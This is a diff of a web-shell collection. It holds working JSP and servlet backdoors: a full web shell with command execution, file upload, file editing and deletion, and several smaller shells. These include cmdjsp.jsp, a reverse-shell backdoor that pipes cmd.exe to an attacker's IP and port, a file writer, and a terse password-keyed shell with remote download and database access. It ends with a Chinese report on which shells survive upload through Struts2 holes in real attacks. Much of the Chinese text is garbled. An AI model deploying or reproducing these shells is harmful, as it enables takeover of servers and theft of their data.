<td height="22">&nbsp;<3B><>ǰ<EFBFBD>û<EFBFBD></td>
<td height="22" colspan="3">&nbsp;<%=env.queryHashtable("user.name")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td>&nbsp;<3B>û<EFBFBD>Ŀ¼</td>
<td colspan="3">&nbsp;<%=env.queryHashtable("user.dir")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td align=left>&nbsp;<3B><><EFBFBD>ļ<EFBFBD>ʵ<EFBFBD><CAB5>·<EFBFBD><C2B7></td>
<td height="8" colspan="3">&nbsp;<%=request.getRealPath(request.getServletPath())%></td>
</tr>
</table>
</td>
</tr>
</table>
<br>
<table width="640" border="0" cellpadding="0" cellspacing="1" class="tableBorder">
<tr>
<td width="454" height="22" align="center" bgcolor="#000000" onclick="showsubmenu(1)"><font color=#FFFFFF><strong>JAVA<56><41><EFBFBD>ز<EFBFBD><D8B2><EFBFBD></strong></font>
</td>
</tr>
<tr>
<td style="display" id='submenu1'>
<table border=0 width=99% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
<tr bgcolor="#666666" height="22">
<td width="30%">&nbsp;<3B><><EFBFBD><EFBFBD></td>
<td width="50%" height="22">&nbsp;Ӣ<><D3A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td>
<td width="20%" height="22">&nbsp;<3B>汾</td>
</tr>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td width="30%">&nbsp;JAVA<56><41><EFBFBD>л<EFBFBD><D0BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td>
<td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.runtime.name")%></td>
<td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.runtime.version")%></td>
</tr>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td width="30%">&nbsp;JAVA<56><41><EFBFBD>л<EFBFBD><D0BB><EFBFBD>˵<EFBFBD><CBB5><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td>
<td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.specification.name")%></td>
<td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.specification.version")%></td>
</tr>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td width="30%">&nbsp;JAVA<56><41><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td>
<td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.vm.name")%></td>
<td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.vm.version")%></td>
</tr>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td width="30%">&nbsp;JAVA<56><41><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˵<EFBFBD><CBB5><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td>
<td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.vm.specification.name")%></td>
<td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.vm.specification.version")%></td>
</tr>
<%
float fFreeMemory=(float)Runtime.getRuntime().freeMemory();
float fTotalMemory=(float)Runtime.getRuntime().totalMemory();
float fPercent=fFreeMemory/fTotalMemory*100;
%>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td height="22">&nbsp;JAVA<56><41><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʣ<EFBFBD><CAA3><EFBFBD>ڴ棺</td>
<td height="22" colspan="2"><img width='8' height="12" align=absmiddle class=PicBar style="background-color: #000000">&nbsp;<%=fFreeMemory/1024/1024%>M
</td>
</tr>
<tr bordercolor="#FFFFFF" bgcolor="#999999" height="22">
<td height="22">&nbsp;JAVA<56><41><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڴ<EFBFBD></td>
<td height="22" colspan="2"><img width='85%' align=absmiddle class=PicBar style="background-color: #000000">&nbsp;<%=fTotalMemory/1024/1024%>M
</td>
</tr>
</table>
<table border=0 width=99% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
<tr bgcolor="#666666" height="22">
<td width="30%">&nbsp;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td>
<td width="70%" height="22">&nbsp;<3B><><EFBFBD><EFBFBD>·<EFBFBD><C2B7></td>
</tr>
<tr bgcolor="#999999" height="22">
<td width="30%">&nbsp;java.class.path </td>
<td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.class.path").replaceAll(env.queryHashtable("path.separator"),env.queryHashtable("path.separator")+"<br>&nbsp;")%>
</td>
</tr>
<tr bgcolor="#999999" height="22">
<td width="30%">&nbsp;java.home</td>
<td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.home")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td width="30%">&nbsp;java.endorsed.dirs</td>
<td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.endorsed.dirs")%></td>
</tr>
<tr bgcolor="#999999" height="22">
<td width="30%">&nbsp;java.library.path</td>
<td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.library.path").replaceAll(env.queryHashtable("path.separator"),env.queryHashtable("path.separator")+"<br>&nbsp;")%>
</td>
</tr>
<tr bgcolor="#999999" height="22">
<td width="30%">&nbsp;java.io.tmpdir</td>
<td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.io.tmpdir")%></td>
</tr>
</table>
</td>
</tr>
</table>
<br>
<div id="testspeed" align="center"> </div>
</CENTER></div>
<%}
else{
if (editfile!=null)//if edit
{
%>
<div id="Layer1" style="position:absolute; left:-17px; top:1029px; width:757px; height:250px; z-index:1">
<table width="99%" height="232" border="0">
<tr>
<td height="226"><form name="form2" method="post" action="">
<p align="center"> <20><>ַ<EFBFBD><D6B7>
<input name="editfile" type="text" value="<%=editfile%>" size="50">
</p>
<p align="center">
<textarea name="content" cols="105" rows="30"><%=readAllFile(editfile)%></textarea>
<input type="submit" name="Submit2" value="<22><><EFBFBD><EFBFBD>">
</p>
</form> </td>
</tr>
</table>
<p>&nbsp;</p></div>
<%}
else{%>
<table border="1" width="770" cellpadding="4" bordercolorlight="#999999" bordercolordark="#ffffff" align="center" cellspacing="0">
<tr bgcolor="#333333">
<td colspan="4" align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff">JspWebShell
version 1.0</font><font color="#FFFFFF">(<28><>վĿ¼:<%=config.getServletContext().getRealPath("/")%>)</font></td>
</tr>
<tr bgcolor="#999999">
<td colspan="4"> <font color="#000000">
<%
File[] fs = File.listRoots();
for (int i = 0; i < fs.length; i++){
%>
<a href="<%=selfName %>?path=<%=fs[i].getPath()%>\"><3E><><EFBFBD>ش<EFBFBD><D8B4><EFBFBD>(<%=fs[i].getPath()%>)
</a>
<%}%>
</font></td>
</tr>
<tr bgcolor="#999999">
<td height="10" colspan="4"> <font color="#000000">
<form name="form1" method="post" action="">
<input type="text" name="command" class="button">
<input type="submit" name="Submit" value="CMD<4D><44><EFBFBD><EFBFBD>ִ<EFBFBD><D6B4>" class="button">
</form>
</font> <p>
<%
String cmd = "";
InputStream ins = null;
String result = "";
if (request.getParameter("command") != null) {
cmd = (String)request.getParameter("command");result = exeCmd(cmd);%>
<%=result == "" ? "&nbsp;" : result%>
<%}%>
</td>
</tr>
<FORM METHOD="POST" ACTION="?up=true&path=<%String path1=config.getServletContext().getRealPath("/"); String tempfilepath=request.getParameter("path"); if(tempfilepath!=null) path1=tempfilepath;path1=path1.replaceAll("\\\\", "\\\\\\\\"); %><%=path1%>" ENCTYPE="multipart/form-data">
<tr bgcolor="#999999">
<td colspan="2"> <INPUT TYPE="FILE" NAME="FILE1" style="width:150" SIZE="50" class="button">
<INPUT TYPE="SUBMIT" VALUE="<22>ϴ<EFBFBD>" class="button"> </td>
<td colspan="2"><a href="?jsptz=true" target="_blank">JSP̽<50><CCBD></a> </td>
</tr>
</FORM>
<% String fileexe="";
String dir="";
String deldir="";
String scrfile="";
String dstfile="";
fileexe=request.getParameter("fileexe");
dir=request.getParameter("dir");
deldir=request.getParameter("deldir");
scrfile=request.getParameter("scrfile");
dstfile=request.getParameter("dstfile");
if (fileexe!=null)
{
//out.print(path+fileexe);
createFile(path+fileexe);
}
if (dir!=null)
{
//out.print(path+dir);
createFolder(path+dir);
}
if (deldir!=null)
{
//out.print(deldir);
DeleteFolder(deldir);
}
if (scrfile!=null&dstfile!=null)
{
//out.print(scrfile);
//out.print(dstfile);
copyfinish=fileCopy(scrfile, dstfile) ;
}
%>
<tr bgcolor="#CCCCCC">
<td height="10" colspan="2" bgcolor="#999999"> <form name="form3" method="post" action="">
<20>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<input name="dir" type="text" size="10" class="button">
<input type="submit" name="Submit3" value="<22>½<EFBFBD>Ŀ¼" class="button">
</form></td>
<td width="188" height="10" bgcolor="#999999"> <form name="form4" method="post" action="">
<20>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>
<input name="fileexe" type="text" size="8" class="button">
<input type="submit" name="Submit4" value="<22>½<EFBFBD><C2BD>ļ<EFBFBD>" class="button">
</form></td>
<td width="327" height="10" bgcolor="#999999"><form name="form5" method="post" action="">
<20>ļ<EFBFBD><input name="scrfile" type="text" size="15"class="button">
<20><><EFBFBD>Ƶ<EFBFBD>
<input name="dstfile" type="text" size="15" class="button">
<input type="submit" name="Submit5" value="<22><><EFBFBD><EFBFBD>" class="button">
</form><font color="#FF0000"><%if(copyfinish==true) out.print("<22><><EFBFBD>Ƴɹ<C6B3>");%></font></td>
</tr>
<%//<2F>ϴ<EFBFBD>
String tempfilename="";
String up=request.getParameter("up");
// String tempfilepath=request.getParameter("filepath");
// out.print(tempfilepath);
if(up!=null)
{
tempfilename=(String)session.getId();
//String tempfilename=request.getParameter("file");
File f1=new File(tempfilepath,tempfilename);
int n;
try
{
InputStream in=request.getInputStream();
BufferedInputStream my_in=new BufferedInputStream(in);
FileOutputStream fout=new FileOutputStream(f1);
BufferedOutputStream my_out=new BufferedOutputStream(fout);
byte[] b=new byte[10000];
while((n=my_in.read(b))!=-1)
{
my_out.write(b,0,n);
}
my_out.flush();
my_out.close();
fout.close();
my_in.close();
in.close();
// out.print("<22>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ɹ<EFBFBD>!<br>");
}
catch(IOException e)
{
out.print("<22>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>ʧ<EFBFBD><CAA7>!");
}
try
{
RandomAccessFile random1=new RandomAccessFile(f1,"r");
random1.readLine();
String filename=random1.readLine();
byte[] b=filename.getBytes("ISO-8859-1");
filename=new String(b);
int pointer=filename.lastIndexOf('\\');
filename=filename.substring(pointer+1,filename.length()-1);
File f2=new File(tempfilepath,filename);
RandomAccessFile random2=new RandomAccessFile(f2,"rw");
random1.seek(0);
for(int i=1; i<=4; i++)
{
String tempstr=random1.readLine();
}
long startPoint=random1.getFilePointer();
random1.seek(random1.length());
long mark=random1.getFilePointer();
int j=0;
long endPoint=0;
while((mark>=0)&&(j<=5))
{
mark--;
random1.seek(mark);
n=random1.readByte();
if(n=='\n')
{
j++;
endPoint=random1.getFilePointer();
}
}
long length=endPoint-startPoint+1;
int order=(int)(length/10000);
int left=(int)(length%10000);
byte[] c=new byte[10000];
random1.seek(startPoint);
for(int i=0; i<order; i++)
{
random1.read(c);
random2.write(c);
}
random1.read(c,0,left);
random2.write(c,0,left);
random1.close();
random2.close();
f1.delete();
out.print("<22>ļ<EFBFBD><C4BC>ϴ<EFBFBD><CFB4>ɹ<EFBFBD>!");
}
catch(Exception e)
{
out.print("<22>ļ<EFBFBD><C4BC>ϴ<EFBFBD>ʧ<EFBFBD><CAA7>!");
}
}
%>
<tr>
<td width="196" height="48" valign="top" bgcolor="#999999">
<% try {
//path=request.getParameter("path");
//if(path==null)
//path=config.getServletContext().getRealPath("/");
File f=new File(path);
File[] fList= f.listFiles() ;
for (int j=0;j<fList.length;j++)
{
if (fList[j].isDirectory())
{%>
<a href="<%=selfName %>?path=<%=path%><%=fList[j].getName()%>\"> <%=fList[j].getName()%></a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="?path=<%=path%>&deldir=<%=path%><%=fList[j].getName()%>">ɾ<><C9BE></a><br>
<% }
}//for
} catch (Exception e) {
System.out.println("<22><><EFBFBD><EFBFBD><EFBFBD>ڻ<EFBFBD>û<EFBFBD><C3BB>Ȩ<EFBFBD><C8A8>");
}
%>
&nbsp; </td>
<td colspan="3" valign="top" bgcolor="#999999">
<% try {
path=request.getParameter("path");
if(path==null)
path=config.getServletContext().getRealPath("/");
File f=new File(path);
File[] fList= f.listFiles() ;
for (int j=0;j<fList.length;j++)
{
if (fList[j].isFile())
{//request.getContextPath()<29>õ<EFBFBD><C3B5><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><C2B7>%>
<%=fList[j].getName()%>
<a href="?path=<%String tempfilepath1=request.getParameter("path"); if(tempfilepath!=null) path=tempfilepath;%><%=path%>&editfile=<%=path%><%=fList[j].getName()%>" target="_blank"><3E>༭</a>
&nbsp; <a href="?action=del&path=<%=path%>&delfile=<%=path%><%=fList[j].getName()%>">ɾ<><C9BE></a><br>
<% }
}//for
} catch (Exception e) {
System.out.println("<22><><EFBFBD><EFBFBD><EFBFBD>ڻ<EFBFBD>û<EFBFBD><C3BB>Ȩ<EFBFBD><C8A8>");
}
%>
</td>
</tr>
</table>
<p align="center">Power By <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>[B.C.T] QQ:48124012</p>
<p align="center">&nbsp;</p>
<%}//if edit
}
}
%>
</body>
</html>

31
jsp/hackk8/JSP/cmdjsp.jsp Normal file
View File

@@ -0,0 +1,31 @@
// note that linux = cmd and windows = "cmd.exe /c + cmd"
<FORM METHOD=GET ACTION='cmdjsp.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) {
output += s;
}
}
catch(IOException e) {
e.printStackTrace();
}
}
%>
<pre>
<%=output %>
</pre>

90
jsp/hackk8/JSP/jsp-reverse.jsp Normal file
View File

@@ -0,0 +1,90 @@
// backdoor.jsp
<%@
page import="java.lang.*, java.util.*, java.io.*, java.net.*"
% >
<%!
static class StreamConnector extends Thread
{
InputStream is;
OutputStream os;
StreamConnector(InputStream is, OutputStream os)
{
this.is = is;
this.os = os;
}
public void run()
{
BufferedReader isr = null;
BufferedWriter osw = null;
try
{
isr = new BufferedReader(new InputStreamReader(is));
osw = new BufferedWriter(new OutputStreamWriter(os));
char buffer[] = new char[8192];
int lenRead;
while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
{
osw.write(buffer, 0, lenRead);
osw.flush();
}
}
catch (Exception ioe)
try
{
if(isr != null) isr.close();
if(osw != null) osw.close();
}
catch (Exception ioe)
}
}
%>
<h1>JSP Backdoor Reverse Shell</h1>
<form method="post">
IP Address
<input type="text" name="ipaddress" size=30>
Port
<input type="text" name="port" size=10>
<input type="submit" name="Connect" value="Connect">
</form>
<p>
<hr>
<%
String ipAddress = request.getParameter("ipaddress");
String ipPort = request.getParameter("port");
if(ipAddress != null && ipPort != null)
{
Socket sock = null;
try
{
sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
Runtime rt = Runtime.getRuntime();
Process proc = rt.exec("cmd.exe");
StreamConnector outputConnector =
new StreamConnector(proc.getInputStream(),
sock.getOutputStream());
StreamConnector inputConnector =
new StreamConnector(sock.getInputStream(),
proc.getOutputStream());
outputConnector.start();
inputConnector.start();
}
catch(Exception e)
}
%>

2326
jsp/hackk8/JSP/jspspy有屏幕.txt Normal file
View File

File diff suppressed because it is too large Load Diff

48
jsp/hackk8/JSP/minupload.jsp Normal file
View File

@@ -0,0 +1,48 @@
<%@page contentType="text/html;charset=utf-8"%>
<%@page import="java.io.*,java.util.*,java.net.*"%>
<html>
<head>
<title>JspDo Code By Xiao.3</title>
<style type="text/css">
body { color:red; font-size:12px; background-color:white; }
</style>
</head>
<body>
<%
if(request.getParameter("context")!=null)
{ //这小马有问题 上传jsp就出错
String context=new String(request.getParameter("context").getBytes("ISO-8859-1"),"utf-8");
String path=new String(request.getParameter("path").getBytes("ISO-8859-1"),"utf-8");
OutputStream pt = null;
try {
pt = new FileOutputStream(path);
pt.write(context.getBytes());
out.println("<a href='"+request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+request.getRequestURI()+"'><font color='red' title='点击可以转到上传的文件页面!'>上传成功!</font></a>");
} catch (FileNotFoundException ex2) {
out.println("<font color='red'>上传失败!</font>");
} catch (IOException ex) {
out.println("<font color='red'>上传失败!</font>");
} finally {
try {
pt.close();
} catch (IOException ex3) {
out.println("<font color='red'>上传失败!</font>");
}
}
}
%>
<form name="frmUpload" method="post" action="">
<font color="blue">本文件的路径:</font><%out.print(request.getRealPath(request.getServletPath())); %>
<br>
<br>
<font color="blue">上传文件路径:</font><input type="text" size="70" name="path" value="<%out.print(getServletContext().getRealPath("/")+"\k8cmd.jsp"); %>">
<br>
<br>
上传文件内容:<textarea name="context" id="context" style="width: 51%; height: 150px;"></textarea>
<br>
<br>
<input type="submit" name="btnSubmit" value="Upload">
</form>
</body>
</html>

1913
jsp/hackk8/JSP/other/download.jsp Normal file
View File

File diff suppressed because it is too large Load Diff

2329
jsp/hackk8/JSP/other/jspspy.jsp Normal file
View File

File diff suppressed because it is too large Load Diff

2323
jsp/hackk8/JSP/other/jspspy_k8.jsp Normal file
View File

File diff suppressed because it is too large Load Diff

59
jsp/hackk8/JSP/other/thx.jsp Normal file
View File

@@ -0,0 +1,59 @@
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
<%!
String Pwd="xc";
String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);}
Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance();
Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;}
void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i<r.length;i++){sb.append(r[i].toString().substring(0,2));}}
void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT, sQ,sF="";java.util.Date dt;
SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0;i<l.length;i++){dt=new java.util.Date(l[i].lastModified());
sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ+=l[i].canWrite()?" W":"";if(l[i].isDirectory()){sb.append(l[i].getName()+"/\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n");}
else{sF+=l[i].getName()+"\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n";}}sb.append(sF);}
void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();
for(int k=0;k<x.length;k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}
void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();
ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));
os.write(("->"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();}
void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile();
FileOutputStream os=new FileOutputStream(f);for(int i=0;i<d.length();i+=2)
{os.write((h.indexOf(d.charAt(i))<<4|h.indexOf(d.charAt(i+1))));}os.close();}
void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();
for(int j=0;j<z.length;j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}
}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);
int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}
void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();}
void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}
void LL(String s, String d)throws Exception{URL u=new URL(s);int n;FileOutputStream os=new FileOutputStream(d);
HttpURLConnection h=(HttpURLConnection)u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];
while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}
void MM(InputStream is, StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));
while((l=br.readLine())!=null){sb.append(l+"\r\n");}}
void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=c.getMetaData().getCatalogs();
while(r.next()){sb.append(r.getString(1)+"\t");}r.close();c.close();}
void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] t={"TABLE"};ResultSet r=c.getMetaData().getTables (null,null,"%",t);
while(r.next()){sb.append(r.getString("TABLE_NAME")+"\t");}r.close();c.close();}
void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("\r\n");Connection c=GC(s);
Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[3]);ResultSetMetaData d=r.getMetaData();
for(int i=1;i<=d.getColumnCount();i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")\t");}r.close();m.close();c.close();}
void QQ(String cs,String s,String q,StringBuffer sb)throws Exception{int i;Connection c=GC(s);Statement m=c.createStatement(1005,1008);
try{ResultSet r=m.executeQuery(q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(i=1;i<=n;i++){sb.append(d.getColumnName(i)+"\t|\t");
}sb.append("\r\n");while(r.next()){for(i=1;i<=n;i++){sb.append(EC(r.getString(i),cs)+"\t|\t");}sb.append("\r\n");}r.close();}
catch(Exception e){sb.append("Result\t|\t\r\n");try{m.executeUpdate(q);sb.append("Execute Successfully!\t|\t\r\n");
}catch(Exception ee){sb.append(ee.toString()+"\t|\t\r\n");}}m.close();c.close();}
%><%
String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs);
String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs);
StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|");
if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}}
else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));
while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();}
else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));
bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}
else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}
else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");}
else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);
MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}
else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);}
}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString());
%>

54
jsp/hackk8/Struts2下shell兼容性报告_K8.txt Normal file
View File

@@ -0,0 +1,54 @@
struts2 环境下 jspshell 功能测试 2013.5.23 by 拉登哥哥
看下这个报告 你们就知道 为啥s2上传的shell成功率低的原因了
上传不成功或内容被过滤是另外的事 上传成功的shell没被过滤又不解析或报错 就是以下原因了
struts 2.2.1.1 默认环境下 以下报告是在这版本下的 别的版本未知
好像默认环境没带有IO操作 还有 org.apache.jasper(S2文件上传组件)
自己找了无组件上传的jsp 也报废...
K8收集的(其实之前也在网上问人要来的一些 wooyun某群群主 还有其它成员)
k8cmd.jsp 兼容性非常好 不管在s2 还是普通环境下都正常使用
实战 支持Win/Linux 还有执行的命令通过飞刀加密发送
普通 cmd.jsp啥的 可以使用 不用说了 但是在linux下不行
other下面的大马 丢到struts2环境下 没一个能正常解析的
JspWebshell 1.2.jsp 能解析 但上传不了文件 好像是马写的有问题
JavaShell.jsp jsp-reverse.jsp 也不能解析
kbaidu8.jsp 兼容性8错 哥专用的 原版 jspspy 1.0 但是上传文件也是失败的 1.2版本的直接报废
Customize.jsp 菜刀的jsp马 本地s2环境 报错 连接上也可以操作
实战 通过struts2的洞 上传过去的 功能就废了(linux下) win的还未测试
JSP无组件实现WEB上传.rar 也失效
一句话jsp那个 可以传过去 但是无法写出文件
77收集的几个 Win下测试
browser.jsp 可以使用 但是文件上传功能报废 原因都是这个组件 org.apache.jasper
还有是cmd相关的也可用 也只是win下的
其它都是直接报废。。。。。
法客工具包里的jsp
no.jsp 其实是那个什么jsfoloer改的 也是上传文件功能不行 别的功能未测
silic webshell.jsp 和no.jsp in.jsp都是jsfoloer改的
JspSpyJDK5.jsp 报废
ma2.jsp 能解析 但上传文件那失败 java.io.IOException: 这就是IO了
ma3.jsp 直接报废 因为使用的是jasper
ma1.jsp 和ma4.jsp job.jsp探针 能正常解析
spjspshell.jsp 直接报废 同ma3.jsp 用的组件一样
总结: 普通单纯执行cmd一类的都能正常运行探针也是 个别大马也勉强 jspspy 1.0兼容性 比较靠普
在这些样本里90%都挂了 实战中 也许有些站加了上传组件啥的 可能部分上传脚本还是能用的 具体自测

BIN
jsp/hackk8/jsp2/CmdServlet.class Normal file
View File

Binary file not shown.

43
jsp/hackk8/jsp2/CmdServlet.java Normal file
View File

@@ -0,0 +1,43 @@
/*
* CmdServlet.java 20/01/2004
*
* @author The Dark Raver
* @version 0.1
*/
import java.io.*;
import javax.servlet.*;
import javax.servlet.http.*;
public class CmdServlet extends HttpServlet {
public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
res.setContentType("text/html");
PrintWriter out = res.getWriter();
out.print("<html><body>");
out.print("<hr><p><form method=\"GET\" name=\"myform\" action=\"\">");
out.print("<input type=\"text\" name=\"cmd\">");
out.print("<input type=\"submit\" value=\"Send\">");
out.print("</form>");
if(req.getParameter("cmd") != null) {
out.print("\n<hr><p><b>Command: " + req.getParameter("cmd") + "\n</b><br><br><hr><pre>\n");
Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd"));
DataInputStream procIn = new DataInputStream(p.getInputStream());
int c='\0';
while ((c=procIn.read()) != -1) {
out.print((char)c);
}
}
out.print("\n<hr></pre>");
out.print("</body></html>");
}
public String getServletInfo() {
return "CmdServlet 0.1";
}
}

BIN
jsp/hackk8/jsp2/ListServlet.class Normal file
View File

Binary file not shown.

86
jsp/hackk8/jsp2/ListServlet.java Normal file
View File

@@ -0,0 +1,86 @@
/*
* ListServlet.java
*
* @author Sierra
* @version 0.1
*/
import java.io.*;
import javax.servlet.ServletException;
import javax.servlet.http.*;
public class ListServlet extends HttpServlet
{
public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
PrintWriter printwriter = res.getWriter();
String path = req.getParameter("file");
printwriter.write("<HTML>\n<HEAD>\n<TITLE>Directory Listing</TITLE>\n</HEAD>\n<BODY>\n");
printwriter.write("<FONT Face=\"Courier New, Helvetica\" Color=\"Black\">\n");
if(req.getParameter("file")==null) path = "c:\\";
printwriter.write("<hr><br><B>Path: <U>" + path + "</U></B><BR><BR><hr><PRE>\n");
File file = new File(path);
if(file.isDirectory())
{
String s = new String("Unknown");
String s2 = new String("Black");
File afile[] = file.listFiles();
for(int i = 0; i < afile.length; i++)
{
String s1 = new String(afile[i].toString());
printwriter.write("(");
String s3;
if(afile[i].isDirectory())
{
printwriter.write("d");
s1 = s1 + "/";
s3 = new String("Blue");
} else
if(afile[i].isFile())
{
printwriter.write("-");
s3 = new String("Green");
} else
{
printwriter.write("?");
s3 = new String("Red");
}
if(afile[i].canRead())
printwriter.write("r");
else
printwriter.write("-");
if(afile[i].canWrite())
printwriter.write("w");
else
printwriter.write("-");
printwriter.write(") <A Style='Color: " + s3.toString() + ";' HRef='?file=" + s1.toString() + "'>" + s1.toString() + "</A> " + "( Size: " + afile[i].length() + " bytes )<BR>\n");
}
printwriter.write("<hr></FONT></BODY></HTML>");
} else
if(file.canRead())
{
FileInputStream fileinputstream = new FileInputStream(file);
int j = 0;
while(j >= 0)
{
j = fileinputstream.read();
printwriter.write(j);
}
fileinputstream.close();
} else
{
printwriter.write("Can't Read file<BR>");
}
}
public String getServletInfo() {
return "Directory Listing";
}
}

BIN
